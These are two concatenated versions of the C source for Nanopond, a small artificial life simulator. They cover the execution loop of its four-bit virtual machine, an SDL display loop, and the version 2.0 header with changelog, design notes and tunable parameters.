return sense ? (((getRandom() & 0xf) >= BITS_IN_FOURBIT_WORD[(c2->genome[0] & 0xf) ^ (c1guess & 0xf)])||(!c2->parentID)) : (((getRandom() & 0xf) <= BITS_IN_FOURBIT_WORD[(c2->genome[0] & 0xf) ^ (c1guess & 0xf)])||(!c2->parentID));
}
/**
* Structure for VM buffers and stacks
*/
struct VMStruct
{
/* Buffer used for execution output of candidate offspring */
uintptr_t outputBuf[POND_DEPTH_SYSWORDS];
/* Virtual machine loop/rep stack */
uintptr_t loopStack_wordPtr[POND_DEPTH];
uintptr_t loopStack_shiftPtr[POND_DEPTH];
};
/* Execute the current cell (stored in the global VM) */
static void executeCell( struct Cell *pptr, const uintptr_t x, const uintptr_t y,
struct VMStruct *VM, uint64_t *cellIdCounter ) {
/* Miscellaneous variables used in the loop */
uintptr_t i,tmp,currentWord,wordPtr,shiftPtr,inst;
/* If this is nonzero, cell execution stops. This allows us
* to avoid the ugly use of a goto to exit the loop. :) */
int stop;
/* Virtual machine memory pointer register (which
* exists in two parts... read the code below...) */
uintptr_t ptr_wordPtr;
uintptr_t ptr_shiftPtr;
/* Virtual machine loop/rep stack pointer */
uintptr_t loopStackPtr;
/* The main "register" */
uintptr_t reg;
/* If this is nonzero, we're skipping to matching REP */
/* It is incremented to track the depth of a nested set
* of LOOP/REP pairs in false state. */
uintptr_t falseLoopDepth;
struct Cell *tmpptr;
/* Reset the state of the VM prior to execution */
memset( VM->outputBuf, 0xff, POND_DEPTH_BYTES );
loopStackPtr = ptr_wordPtr = ptr_shiftPtr = reg = falseLoopDepth = 0;
wordPtr = EXEC_START_WORD;
shiftPtr = EXEC_START_BIT;
stop = 0;
/* We use a currentWord buffer to hold the word we're
* currently working on. This speeds things up a bit
* since it eliminates a pointer dereference in the
* inner loop. We have to be careful to refresh this
* whenever it might have changed... take a look at
* the code. :) */
currentWord = pptr->genome[0];
/* Keep track of how many cells have been executed */
statCounters.cellExecutions += 1.0;
/* Core execution loop */
while (pptr->energy&&(!stop)) {
/* Get the next instruction */
inst = (currentWord >> shiftPtr) & 0xf;
/* Randomly frob either the instruction or the register with a
* probability defined by MUTATION_RATE. This introduces variation,
* and since the variation is introduced into the state of the VM
* it can have all manner of different effects on the end result of
* replication: insertions, deletions, duplications of entire
* ranges of the genome, etc. */
if ((getRandom() & 0xffffffff) < MUTATION_RATE) {
tmp = getRandom(); /* Call getRandom() only once for speed */
if (tmp & 0x80) /* Check for the 8th bit to get random boolean */
inst = tmp & 0xf; /* Only the first four bits are used here */
else reg = tmp & 0xf;
}
/* Each instruction processed costs one unit of energy */
--pptr->energy;
/* Execute the instruction */
if (falseLoopDepth) {
/* Skip forward to matching REP if we're in a false loop. */
if (inst == 0x9) /* Increment false LOOP depth */
++falseLoopDepth;
else if (inst == 0xa) /* Decrement on REP */
--falseLoopDepth;
} else {
/* If we're not in a false LOOP/REP, execute normally */
/* Keep track of execution frequencies for each instruction */
statCounters.instructionExecutions[inst] += 1.0;
switch(inst) {
case 0x0: /* ZERO: Zero VM state registers */
reg = ptr_wordPtr = ptr_shiftPtr = 0;
break;
case 0x1: /* FWD: Increment the pointer (wrap at end) */
if ((ptr_shiftPtr += 4) >= SYSWORD_BITS) {
if (++ptr_wordPtr >= POND_DEPTH_SYSWORDS)
ptr_wordPtr = 0;
ptr_shiftPtr = 0;
}
break;
case 0x2: /* BACK: Decrement the pointer (wrap at beginning) */
if (ptr_shiftPtr)
ptr_shiftPtr -= 4;
else {
if (ptr_wordPtr)
--ptr_wordPtr;
else ptr_wordPtr = POND_DEPTH_SYSWORDS - 1;
ptr_shiftPtr = SYSWORD_BITS - 4;
}
break;
case 0x3: /* INC: Increment the register */
reg = (reg + 1) & 0xf;
break;
case 0x4: /* DEC: Decrement the register */
reg = (reg - 1) & 0xf;
break;
case 0x5: /* READG: Read into the register from genome */
reg = (pptr->genome[ptr_wordPtr] >> ptr_shiftPtr) & 0xf;
break;
case 0x6: /* WRITEG: Write out from the register to genome */
#ifdef ALLOW_GENOME_WRITE_COMMANDS
pptr->genome[ptr_wordPtr] &= ~(((uintptr_t)0xf) << ptr_shiftPtr);
pptr->genome[ptr_wordPtr] |= reg << ptr_shiftPtr;
currentWord = pptr->genome[wordPtr]; /* Must refresh in case this changed! */
#else
stop = 1;
#endif
break;
case 0x7: /* READB: Read into the register from buffer */
reg = (VM->outputBuf[ptr_wordPtr] >> ptr_shiftPtr) & 0xf;
break;
case 0x8: /* WRITEB: Write out from the register to buffer */
VM->outputBuf[ptr_wordPtr] &= ~(((uintptr_t)0xf) << ptr_shiftPtr);
VM->outputBuf[ptr_wordPtr] |= reg << ptr_shiftPtr;
break;
case 0x9: /* LOOP: Jump forward to matching REP if register is zero */
if (reg) {
if (loopStackPtr >= POND_DEPTH)
stop = 1; /* Stack overflow ends execution */
else {
VM->loopStack_wordPtr[loopStackPtr] = wordPtr;
VM->loopStack_shiftPtr[loopStackPtr] = shiftPtr;
++loopStackPtr;
}
} else falseLoopDepth = 1;
break;
case 0xa: /* REP: Jump back to matching LOOP if register is nonzero */
if (loopStackPtr) {
--loopStackPtr;
if (reg) {
wordPtr = VM->loopStack_wordPtr[loopStackPtr];
shiftPtr = VM->loopStack_shiftPtr[loopStackPtr];
currentWord = pptr->genome[wordPtr];
/* This ensures that the LOOP is rerun */
continue;
}
}
break;
case 0xb: /* Used to be TURN;
* Now it's EJECT: eject output buffer into neighbor at location 0.
* Get neighbor direction from register and access permission from first
* value in buffer. (((TBD: eject into location at ptr_wordPtr, not 0))) */
/* This should also obsolete the KILL command. */
/* Copy outputBuf into neighbor if access is permitted and there
* is energy there to make something happen. There is no need
* to copy to a cell with no energy, since anything copied there
* would never be executed and then would be replaced with random
* junk eventually. See the seeding code in the main loop above. */
if ((VM->outputBuf[0] & 0xff) != 0xff) {
tmpptr = getNeighbor(x,y,reg&3);
if (accessAllowed(tmpptr,VM->outputBuf[0]&0xf,0)) {
/* Log it if we're replacing a viable cell */
if ( cellIsAlive( tmpptr ) )
++statCounters.viableCellsReplaced;
tmpptr->ID = ++ *cellIdCounter;
tmpptr->parentID = pptr->ID;
tmpptr->lineage = pptr->lineage; /* Lineage is copied in offspring */
tmpptr->generation = pptr->generation + 1;
tmpptr->children = 0;
pptr->children = pptr->children + 1;
memcpy( tmpptr->genome, VM->outputBuf, POND_DEPTH_BYTES );
// Reset the VM state so that the cell has to work hard to reproduce again!
reg = ptr_wordPtr = ptr_shiftPtr = 0;
memset( VM->outputBuf, 0xff, POND_DEPTH_BYTES );
}
}
break;
case 0xc: /* XCHG: Skip next instruction and exchange value of register with it */
#ifdef ALLOW_GENOME_WRITE_COMMANDS
if ((shiftPtr += 4) >= SYSWORD_BITS) {
if (++wordPtr >= POND_DEPTH_SYSWORDS) {
wordPtr = EXEC_START_WORD;
shiftPtr = EXEC_START_BIT;
} else shiftPtr = 0;
}
tmp = reg;
reg = (pptr->genome[wordPtr] >> shiftPtr) & 0xf;
pptr->genome[wordPtr] &= ~(((uintptr_t)0xf) << shiftPtr);
pptr->genome[wordPtr] |= tmp << shiftPtr;
currentWord = pptr->genome[wordPtr];
#else
stop = 1;
#endif
break;
case 0xd: /* KILL: Blow away neighboring cell if allowed with penalty on failure */
tmpptr = getNeighbor(x,y,reg&3);
if (accessAllowed(tmpptr,reg,0)) {
if ( cellIsViable( tmpptr ) )
++statCounters.viableCellsKilled;
/* Filling first two words with 0xfffff... is enough */
tmpptr->genome[0] = ~((uintptr_t)0);
tmpptr->genome[1] = ~((uintptr_t)0);
tmpptr->ID = *cellIdCounter;
tmpptr->parentID = 0;
tmpptr->lineage = *cellIdCounter;
tmpptr->generation = tmpptr->children = 0;
++ *cellIdCounter;
} else if ( cellIsViable( tmpptr ) ) {
tmp = pptr->energy / FAILED_KILL_PENALTY;
if (pptr->energy > tmp)
pptr->energy -= tmp;
else pptr->energy = 0;
}
break;
case 0xe: /* SHARE: Equalize energy between self and neighbor if allowed */
tmpptr = getNeighbor(x,y,reg&3);
if (accessAllowed(tmpptr,reg,1)) {
if ( cellIsViable( tmpptr ) )
++statCounters.viableCellShares;
tmp = pptr->energy + tmpptr->energy;
tmpptr->energy = tmp / 2;
pptr->energy = tmp - tmpptr->energy;
}
break;
case 0xf: /* STOP: End execution */
stop = 1;
break;
}
}
/* Advance the shift and word pointers, and loop around
* to the beginning at the end of the genome. */
if ((shiftPtr += 4) >= SYSWORD_BITS) {
if (++wordPtr >= POND_DEPTH_SYSWORDS) {
wordPtr = EXEC_START_WORD;
shiftPtr = EXEC_START_BIT;
} else shiftPtr = 0;
currentWord = pptr->genome[wordPtr];
}
}
}
/**
* Main method
*
* @param argc Number of args
* @param argv Argument array
*/
int main(int argc,char **argv)
{
uintptr_t i,x,y,paused;
int tmp;
struct Cell *tmpptr;
/* Clock is incremented on each core loop */
uint64_t clock = 0;
/* This is used to generate unique cell IDs */
uint64_t cellIdCounter = 0;
/* This is used allow the user to increase or decrease mean energy input */
intptr_t energyClockDelta = 0;
/* Seed and init the random number generator */
init_genrand(time(NULL));
for(i=0;i<1024;++i)
getRandom();
/* Clear the pond and initialize all genomes
* to 0xffff and all counters to 0 ... */
reset();
/* Set up SDL if we're using it */
#ifdef USE_SDL
SDL_Surface *screen;
SDL_Event sdlEvent;
if (SDL_Init(SDL_INIT_VIDEO) < 0 ) {
fprintf(stderr,"*** Unable to init SDL: %s ***\n",SDL_GetError());
exit(1);
}
atexit(SDL_Quit);
SDL_WM_SetCaption("nanopond","nanopond");
screen = SDL_SetVideoMode(POND_SIZE_X,POND_SIZE_Y,8,SDL_SWSURFACE);
if (!screen) {
fprintf(stderr, "*** Unable to create SDL window: %s ***\n", SDL_GetError());
exit(1);
}
const uintptr_t sdlPitch = screen->pitch;
#endif /* USE_SDL */
/* Global VM */
struct VMStruct VM;
#ifdef ALLOW_GENOME_WRITE_COMMANDS
fprintf(stderr,"Enabling commands that allow cells to write to their own genome:\n%s\n",
"XCHG and WRITEG");
#endif
/* Main loop */
paused = 0;
for(;;) {
#ifdef USE_SDL
/* SDL display is refreshed every SDL_UPDATE_FREQUENCY */
if (!(clock % SDL_UPDATE_FREQUENCY)) {
while (SDL_PollEvent(&sdlEvent)) {
if (sdlEvent.type == SDL_QUIT) {
fprintf(stderr,"[QUIT] Quit signal received!\n");
exit(0);
} else if (sdlEvent.type == SDL_MOUSEBUTTONDOWN) {
switch (sdlEvent.button.button) {
case SDL_BUTTON_LEFT:
fprintf(stderr,"[INTERFACE] Genome of cell at (%d, %d):\n",sdlEvent.button.x, sdlEvent.button.y);
dumpCell(stderr, &pond[sdlEvent.button.x][sdlEvent.button.y],
(uintptr_t)sdlEvent.button.x, (uintptr_t)sdlEvent.button.y, 1);
break;
}
} else if ( sdlEvent.type == SDL_KEYDOWN ) {
switch( sdlEvent.key.keysym.sym ) {
case 'q':
fprintf(stderr,"[QUIT] Quit signal received!\n");
exit(0);
break;
case 'r':
fprintf(stderr,"[RESTART] Restart signal received!\n");
reset();
//clock = cellIdCounter = 0;
break;
case 'd':
fprintf(stderr,"[DUMP] Dump signal received!\n");
if (doDump(clock))
doScreenshot(clock,screen);
doReport(stderr,clock);
break;
case 'p':
fprintf(stderr,"[PAUSE] Pause signal received!\n");
paused = !paused;
break;
case 's':
fprintf(stderr,"[SAVE] Save signal received!\n");
doSaveOpen( 's', &clock, &cellIdCounter );
break;
case 'o':
fprintf(stderr,"[Open] Open signal received!\n");
doSaveOpen( 'o', &clock, &cellIdCounter );
break;
case '-':
if ( energyClockDelta > -INFLOW_FREQUENCY + 21 ) energyClockDelta -= 20;
else energyClockDelta -= 2;
if (energyClockDelta <= -INFLOW_FREQUENCY)
energyClockDelta = -INFLOW_FREQUENCY+1;
fprintf(stderr,"[ENERGY] Energy clock ticks decreased to %d!\n",
energyClockDelta);
break;
case '=':
if ( energyClockDelta >= -INFLOW_FREQUENCY + 20 ) energyClockDelta += 20;
else energyClockDelta += 2;
fprintf(stderr,"[ENERGY] Energy clock ticks increased to %d!\n",
energyClockDelta);
break;
case '1':
case '2':
case '3':
case '4':
colorScheme = sdlEvent.key.keysym.sym - '1';
fprintf(stderr,"[COLOR SCHEME] Switching to color scheme \"%s\".\n",
colorSchemeName[colorScheme]);
for (y=0;y<POND_SIZE_Y;++y) {
for (x=0;x<POND_SIZE_X;++x)
((uint8_t *)screen->pixels)[x + (y * sdlPitch)] = getColor(&pond[x][y]);
}
break;
}
}
}
if (!paused)
SDL_UpdateRect(screen,0,0,POND_SIZE_X,POND_SIZE_Y);
}
if (paused) {
sleep(2);
continue;
}
#endif /* USE_SDL */
/* Stop at STOP_AT if defined */
#ifdef STOP_AT
if (clock >= STOP_AT) {
/* Also do a final dump if dumps are enabled */
#ifdef DUMP_FREQUENCY
doDump(clock);
#ifdef USE_SDL
doScreenshot(clock,screen);
#endif
#endif /* DUMP_FREQUENCY */
fprintf(stderr,"[QUIT] STOP_AT clock value reached\n");
break;
}
#endif /* STOP_AT */
/* Increment clock and run reports periodically */
/* Clock is incremented at the start, so it starts at 1 */
if (!(++clock % REPORT_FREQUENCY))
doReport(stdout,clock);
/* Periodically dump the viable population if defined */
#ifdef DUMP_FREQUENCY
if (!(clock % DUMP_FREQUENCY)) {
tmp = doDump(clock);
#ifdef USE_SDL
if (tmp) doScreenshot(clock,screen);
#endif
}
#endif /* DUMP_FREQUENCY */
/* Introduce a random cell or mutation somewhere with a given energy level */
/* This is called seeding, and introduces both energy and
* entropy into the substrate. This happens every INFLOW_FREQUENCY
* clock ticks. */
if (!(clock % (INFLOW_FREQUENCY+energyClockDelta))) {
x = getRandom() % POND_SIZE_X;
y = getRandom() % POND_SIZE_Y;
tmpptr = &pond[x][y];
if (!cellIsAlive(tmpptr)) { /* New random cell */
for(i=0;i<POND_DEPTH_SYSWORDS;++i)
tmpptr->genome[i] = getRandom();
tmpptr->ID = cellIdCounter;
tmpptr->parentID = 0;
tmpptr->lineage = cellIdCounter;
tmpptr->generation = tmpptr->children = 0;
} else { /* Random mutation in this living cell (like UV radiation) */
tmpptr->genome[getRandom() % POND_DEPTH_SYSWORDS] = getRandom();
}
#ifdef INFLOW_RATE_VARIATION
tmpptr->energy += INFLOW_RATE_BASE + (getRandom() % INFLOW_RATE_VARIATION);
#else
tmpptr->energy += INFLOW_RATE_BASE;
#endif /* INFLOW_RATE_VARIATION */
++cellIdCounter;
/* Update the random cell on SDL screen if viz is enabled */
#ifdef USE_SDL
if (SDL_MUSTLOCK(screen))
SDL_LockSurface(screen);
((uint8_t *)screen->pixels)[x + (y * sdlPitch)] = getColor(tmpptr);
if (SDL_MUSTLOCK(screen))
SDL_UnlockSurface(screen);
#endif /* USE_SDL */
}
/* Pick a random cell to execute */
x = getRandom() % POND_SIZE_X;
y = getRandom() % POND_SIZE_Y;
tmpptr = &pond[x][y];
/* Execute the cell */
executeCell( tmpptr, x, y, &VM, &cellIdCounter );
/* Update the neighborhood on SDL screen to show any changes. */
#ifdef USE_SDL
if (SDL_MUSTLOCK(screen))
SDL_LockSurface(screen);
((uint8_t *)screen->pixels)[x + (y * sdlPitch)] = getColor(tmpptr);
if (x) {
((uint8_t *)screen->pixels)[(x-1) + (y * sdlPitch)] = getColor(&pond[x-1][y]);
if (x < (POND_SIZE_X-1))
((uint8_t *)screen->pixels)[(x+1) + (y * sdlPitch)] = getColor(&pond[x+1][y]);
else ((uint8_t *)screen->pixels)[y * sdlPitch] = getColor(&pond[0][y]);
} else {
((uint8_t *)screen->pixels)[(POND_SIZE_X-1) + (y * sdlPitch)] = getColor(&pond[POND_SIZE_X-1][y]);
((uint8_t *)screen->pixels)[1 + (y * sdlPitch)] = getColor(&pond[1][y]);
}
if (y) {
((uint8_t *)screen->pixels)[x + ((y-1) * sdlPitch)] = getColor(&pond[x][y-1]);
if (y < (POND_SIZE_Y-1))
((uint8_t *)screen->pixels)[x + ((y+1) * sdlPitch)] = getColor(&pond[x][y+1]);
else ((uint8_t *)screen->pixels)[x] = getColor(&pond[x][0]);
} else {
((uint8_t *)screen->pixels)[x + ((POND_SIZE_Y-1) * sdlPitch)] = getColor(&pond[x][POND_SIZE_Y-1]);
((uint8_t *)screen->pixels)[x + sdlPitch] = getColor(&pond[x][1]);
}
if (SDL_MUSTLOCK(screen))
SDL_UnlockSurface(screen);
#endif /* USE_SDL */
}
exit(0);
return 0; /* Make compiler shut up */
}
<file_sep>/* *********************************************************************** */
/* */
/* Nanopond version 2.0 -- A teeny tiny artificial life virtual machine */
/* Copyright (C) <NAME> */
/* MIT license -- see LICENSE.txt */
/* */
/* *********************************************************************** */
/*
* Changelog:
*
* 1.0 - Initial release
* 1.1 - Made empty cells get initialized with 0xffff... instead of zeros
* when the simulation starts. This makes things more consistent with
* the way the output buf is treated for self-replication, though
* the initial state rapidly becomes irrelevant as the simulation
* gets going. Also made one or two very minor performance fixes.
* 1.2 - Added statistics for execution frequency and metabolism, and made
* the visualization use 16bpp color.
* 1.3 - Added a few other statistics.
* 1.4 - Replaced SET with KILL and changed EAT to SHARE. The SHARE idea
* was contributed by <NAME> (http://www.falma.de/). KILL
* is a variation on the original EAT that is easier for cells to
* make use of.
* 1.5 - Made some other instruction changes such as XCHG and added a
* penalty for failed KILL attempts. Also made access permissions
* stochastic.
* 1.6 - Made cells all start facing in direction 0. This removes a bit
* of artificiality and requires cells to evolve the ability to
* turn in various directions in order to reproduce in anything but
* a straight line. It also makes pretty graphics.
* 1.7 - Added more statistics, such as original lineage, and made the
* genome dump files CSV files as well.
* 1.8 - Fixed LOOP/REP bug reported by user Sotek. Thanks! Also
* reduced the default mutation rate a bit.
* 1.9 - Added a bunch of changes suggested by <NAME>: a better
* coloring algorithm, right click to switch coloring schemes (two
* are currently supported), and a few speed optimizations. Also
* changed visualization so that cells with generations less than 2
* are no longer shown.
* 2.0 - Ported to SDL2 by <NAME>, and added simple pthread based
* threading to make it take advantage of modern machines.
*/
/*
* Nanopond is just what it says: a very very small and simple artificial
* life virtual machine.
*
* It is a "small evolving program" based artificial life system of the same
* general class as Tierra, Avida, and Archis. It is written in very tight
* and efficient C code to make it as fast as possible, and is so small that
* it consists of only one .c file.
*
* How Nanopond works:
*
* The Nanopond world is called a "pond." It is an NxN two dimensional
* array of Cell structures, and it wraps at the edges (it's toroidal).
* Each Cell structure consists of a few attributes that are there for
* statistics purposes, an energy level, and an array of POND_DEPTH
* four-bit values. (The four-bit values are actually stored in an array
* of machine-size words.) The array in each cell contains the genome
* associated with that cell, and POND_DEPTH is therefore the maximum
* allowable size for a cell genome.
*
* The first four bit value in the genome is called the "logo." What that is
* for will be explained later. The remaining four bit values each code for
* one of 16 instructions. Instruction zero (0x0) is NOP (no operation) and
* instruction 15 (0xf) is STOP (stop cell execution). Read the code to see
* what the others are. The instructions are exceptionless and lack fragile
* operands. This means that *any* arbitrary sequence of instructions will
* always run and will always do *something*. This is called an evolvable
* instruction set, because programs coded in an instruction set with these
* basic characteristics can mutate. The instruction set is also
* Turing-complete, which means that it can theoretically do anything any
* computer can do. If you're curious, the instruciton set is based on this:
* http://www.muppetlabs.com/~breadbox/bf/
*
* At the center of Nanopond is a core loop. Each time this loop executes,
* a clock counter is incremented and one or more things happen:
*
* - Every REPORT_FREQUENCY clock ticks a line of comma seperated output
* is printed to STDOUT with some statistics about what's going on.
* - Every INFLOW_FREQUENCY clock ticks a random x,y location is picked,
* energy is added (see INFLOW_RATE_MEAN and INFLOW_RATE_DEVIATION)
* and it's genome is filled with completely random bits. Statistics
* are also reset to generation==0 and parentID==0 and a new cell ID
* is assigned.
* - Every tick a random x,y location is picked and the genome inside is
* executed until a STOP instruction is encountered or the cell's
* energy counter reaches zero. (Each instruction costs one unit energy.)
*
* The cell virtual machine is an extremely simple register machine with
* a single four bit register, one memory pointer, one spare memory pointer
* that can be exchanged with the main one, and an output buffer. When
* cell execution starts, this output buffer is filled with all binary 1's
* (0xffff....). When cell execution is finished, if the first byte of
* this buffer is *not* 0xff, then the VM says "hey, it must have some
* data!". This data is a candidate offspring; to reproduce cells must
* copy their genome data into the output buffer.
*
* When the VM sees data in the output buffer, it looks at the cell
* adjacent to the cell that just executed and checks whether or not
* the cell has permission (see below) to modify it. If so, then the
* contents of the output buffer replace the genome data in the
* adjacent cell. Statistics are also updated: parentID is set to the
* ID of the cell that generated the output and generation is set to
* one plus the generation of the parent.
*
* A cell is permitted to access a neighboring cell if:
* - That cell's energy is zero
* - That cell's parentID is zero
* - That cell's logo (remember?) matches the trying cell's "guess"
*
* Since randomly introduced cells have a parentID of zero, this allows
* real living cells to always replace them or eat them.
*
* The "guess" is merely the value of the register at the time that the
* access attempt occurs.
*
* Permissions determine whether or not an offspring can take the place
* of the contents of a cell and also whether or not the cell is allowed
* to EAT (an instruction) the energy in it's neighbor.
*
* If you haven't realized it yet, this is why the final permission
* criteria is comparison against what is called a "guess." In conjunction
* with the ability to "eat" neighbors' energy, guess what this permits?
*
* Since this is an evolving system, there have to be mutations. The
* MUTATION_RATE sets their probability. Mutations are random variations
* with a frequency defined by the mutation rate to the state of the
* virtual machine while cell genomes are executing. Since cells have
* to actually make copies of themselves to replicate, this means that
* these copies can vary if mutations have occurred to the state of the
* VM while copying was in progress.
*
* What results from this simple set of rules is an evolutionary game of
* "corewar." In the beginning, the process of randomly generating cells
* will cause self-replicating viable cells to spontaneously emerge. This
* is something I call "random genesis," and happens when some of the
* random gak turns out to be a program able to copy itself. After this,
* evolution by natural selection takes over. Since natural selection is
* most certainly *not* random, things will start to get more and more
* ordered and complex (in the functional sense). There are two commodities
* that are scarce in the pond: space in the NxN grid and energy. Evolving
* cells compete for access to both.
*
* If you want more implementation details such as the actual instruction
* set, read the source. It's well commented and is not that hard to
* read. Most of it's complexity comes from the fact that four-bit values
* are packed into machine size words by bit shifting. Once you get that,
* the rest is pretty simple.
*
* Nanopond, for it's simplicity, manifests some really interesting
* evolutionary dynamics. While I haven't run the kind of multiple-
* month-long experiment necessary to really see this (I might!), it
* would appear that evolution in the pond doesn't get "stuck" on just
* one or a few forms the way some other simulators are apt to do.
* I think simplicity is partly reponsible for this along with what
* biologists call embeddedness, which means that the cells are a part
* of their own world.
*
* Run it for a while... the results can be... interesting!
*
* Running Nanopond:
*
* Nanopond can use SDL (Simple Directmedia Layer) for screen output. If
* you don't have SDL, comment out USE_SDL below and you'll just see text
* statistics and get genome data dumps. (Turning off SDL will also speed
* things up slightly.)
*
* After looking over the tunable parameters below, compile Nanopond and
* run it. Here are some example compilation commands from Linux:
*
* For Pentiums:
* gcc -O6 -march=pentium -funroll-loops -fomit-frame-pointer -s
* -o nanopond nanopond.c -lSDL
*
* For Athlons with gcc 4.0+:
* gcc -O6 -msse -mmmx -march=athlon -mtune=athlon -ftree-vectorize
* -funroll-loops -fomit-frame-pointer -o nanopond nanopond.c -lSDL
*
* The second line is for gcc 4.0 or newer and makes use of GCC's new
* tree vectorizing feature. This will speed things up a bit by
* compiling a few of the loops into MMX/SSE instructions.
*
* This should also work on other Posix-compliant OSes with relatively
* new C compilers. (Really old C compilers will probably not work.)
* On other platforms, you're on your own! On Windows, you will probably
* need to find and download SDL if you want pretty graphics and you
* will need a compiler. MinGW and Borland's BCC32 are both free. I
* would actually expect those to work better than Microsoft's compilers,
* since MS tends to ignore C/C++ standards. If stdint.h isn't around,
* you can fudge it like this:
*
* #define uintptr_t unsigned long (or whatever your machine size word is)
* #define uint8_t unsigned char
* #define uint16_t unsigned short
* #define uint64_t unsigned long long (or whatever is your 64-bit int)
*
* When Nanopond runs, comma-seperated stats (see doReport() for
* the columns) are output to stdout and various messages are output
* to stderr. For example, you might do:
*
* ./nanopond >>stats.csv 2>messages.txt &
*
* To get both in seperate files.
*
* Have fun!
*/
/* ----------------------------------------------------------------------- */
/* Tunable parameters */
/* ----------------------------------------------------------------------- */
/* Frequency of comprehensive reports-- lower values will provide more
* info while slowing down the simulation. Higher values will give less
* frequent updates. */
/* This is also the frequency of screen refreshes if SDL is enabled. */
#define REPORT_FREQUENCY 200000
/* Mutation rate -- range is from 0 (none) to 0xffffffff (all mutations!) */
/* To get it from a float probability from 0.0 to 1.0, multiply it by
* 4294967295 (0xffffffff) and round. */
#define MUTATION_RATE 5000
/* How frequently should random cells / energy be introduced?
* Making this too high makes things very chaotic. Making it too low
* might not introduce enough energy. */
#define INFLOW_FREQUENCY 100
/* Base amount of energy to introduce per INFLOW_FREQUENCY ticks */
#define INFLOW_RATE_BASE 600
/* A random amount of energy between 0 and this is added to
* INFLOW_RATE_BASE when energy is introduced. Comment this out for
* no variation in inflow rate. */
#define INFLOW_RATE_VARIATION 1000
/* Size of pond in X and Y dimensions. */
#define POND_SIZE_X 800
#define POND_SIZE_Y 600
/* Depth of pond in four-bit codons -- this is the maximum
* genome size. This *must* be a multiple of 16! */
#define POND_DEPTH 1024
/* This is the divisor that determines how much energy is taken
* from cells when they try to KILL a viable cell neighbor and
* fail. Higher numbers mean lower penalties. */
#define FAILED_KILL_PENALTY 3
/* Define this to use SDL. To use SDL, you must have SDL headers
* available and you must link with the SDL library when you compile. */
/* Comment this out to compile without SDL visualization support. */
#define USE_SDL 1
/* Define this to use threads, and how many threads to create */
#define USE_PTHREADS_COUNT 4
/* ----------------------------------------------------------------------- */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#ifdef USE_PTHREADS_COUNT
#include <pthread.h>
#endif
#ifdef USE_SDL
#ifdef _MSC_VER
#include <SDL.h>
#else
#include <SDL2/SDL.h>
#endif /* _MSC_VER */
#endif /* USE_SDL */
volatile uint64_t prngState[2];
static inline uintptr_t getRandom()
{
// https://en.wikipedia.org/wiki/Xorshift#xorshift.2B
uint64_t x = prngState[0];
const uint64_t y = prngState[1];
prngState[0] = y;
x ^= x << 23;
const uint64_t z = x ^ y ^ (x >> 17) ^ (y >> 26);
prngState[1] = z;
return (uintptr_t)(z + y);
}
/* Pond depth in machine-size words. This is calculated from
* POND_DEPTH and the size of the machine word. (The multiplication
* by two is due to the fact that there are two four-bit values in
* each eight-bit byte.) */
#define POND_DEPTH_SYSWORDS (POND_DEPTH / (sizeof(uintptr_t) * 2))
/* Number of bits in a machine-size word */
#define SYSWORD_BITS (sizeof(uintptr_t) * 8)
/* Constants representing neighbors in the 2D grid. */
#define N_LEFT 0
#define N_RIGHT 1
#define N_UP 2
#define N_DOWN 3
/* Word and bit at which to start execution */
/* This is after the "logo" */
#define EXEC_START_WORD 0
#define EXEC_START_BIT 4
/* Number of bits set in binary numbers 0000 through 1111 */
static const uintptr_t BITS_IN_FOURBIT_WORD[16] = { 0,1,1,2,1,2,2,3,1,2,2,3,2,3,3,4 };
/**
* Structure for a cell in the pond
*/
struct Cell
{
/* Globally unique cell ID */
uint64_t ID;
/* ID of the cell's parent */
uint64_t parentID;
/* Counter for original lineages -- equal to the cell ID of
* the first cell in the line. */
uint64_t lineage;
/* Generations start at 0 and are incremented from there. */
uintptr_t generation;
/* Energy level of this cell */
uintptr_t energy;
/* Memory space for cell genome (genome is stored as four
* bit instructions packed into machine size words) */
uintptr_t genome[POND_DEPTH_SYSWORDS];
#ifdef USE_PTHREADS_COUNT
pthread_mutex_t lock;
#endif
};
/* The pond is a 2D array of cells */
static struct Cell pond[POND_SIZE_X][POND_SIZE_Y];
/* This is used to generate unique cell IDs */
static volatile uint64_t cellIdCounter = 0;
/* Currently selected color scheme */
enum { KINSHIP,LINEAGE,MAX_COLOR_SCHEME } colorScheme = KINSHIP;
static const char *colorSchemeName[2] = { "KINSHIP", "LINEAGE" };
#ifdef USE_SDL
static SDL_Window *window;
static SDL_Surface *winsurf;
static SDL_Surface *screen;
#endif
volatile struct {
/* Counts for the number of times each instruction was
* executed since the last report. */
double instructionExecutions[16];
/* Number of cells executed since last report */
double cellExecutions;
/* Number of viable cells replaced by other cells' offspring */
uintptr_t viableCellsReplaced;
/* Number of viable cells KILLed */
uintptr_t viableCellsKilled;
/* Number of successful SHARE operations */
uintptr_t viableCellShares;
} statCounters;
static void doReport(const uint64_t clock)
{
static uint64_t lastTotalViableReplicators = 0;
uintptr_t x,y;
uint64_t totalActiveCells = 0;
uint64_t totalEnergy = 0;
uint64_t totalViableReplicators = 0;
uintptr_t maxGeneration = 0;
for(x=0;x<POND_SIZE_X;++x) {
for(y=0;y<POND_SIZE_Y;++y) {
struct Cell *const c = &pond[x][y];
if (c->energy) {
++totalActiveCells;
totalEnergy += (uint64_t)c->energy;
if (c->generation > 2)
++totalViableReplicators;
if (c->generation > maxGeneration)
maxGeneration = c->generation;
}
}
}
/* Look here to get the columns in the CSV output */
/* The first five are here and are self-explanatory */
printf("%llu,%llu,%llu,%llu,%llu,%llu,%llu,%llu",
(uint64_t)clock,
(uint64_t)totalEnergy,
(uint64_t)totalActiveCells,
(uint64_t)totalViableReplicators,
(uint64_t)maxGeneration,
(uint64_t)statCounters.viableCellsReplaced,
(uint64_t)statCounters.viableCellsKilled,
(uint64_t)statCounters.viableCellShares
);
/* The next 16 are the average frequencies of execution for each
* instruction per cell execution. */
double totalMetabolism = 0.0;
for(x=0;x<16;++x) {
totalMetabolism += statCounters.instructionExecutions[x];
printf(",%.4f",(statCounters.cellExecutions > 0.0) ? (statCounters.instructionExecutions[x] / statCounters.cellExecutions) : 0.0);
}
/* The last column is the average metabolism per cell execution */
printf(",%.4f\n",(statCounters.cellExecutions > 0.0) ? (totalMetabolism / statCounters.cellExecutions) : 0.0);
fflush(stdout);
if ((lastTotalViableReplicators > 0)&&(totalViableReplicators == 0))
fprintf(stderr,"[EVENT] Viable replicators have gone extinct. Please reserve a moment of silence.\n");
else if ((lastTotalViableReplicators == 0)&&(totalViableReplicators > 0))
fprintf(stderr,"[EVENT] Viable replicators have appeared!\n");
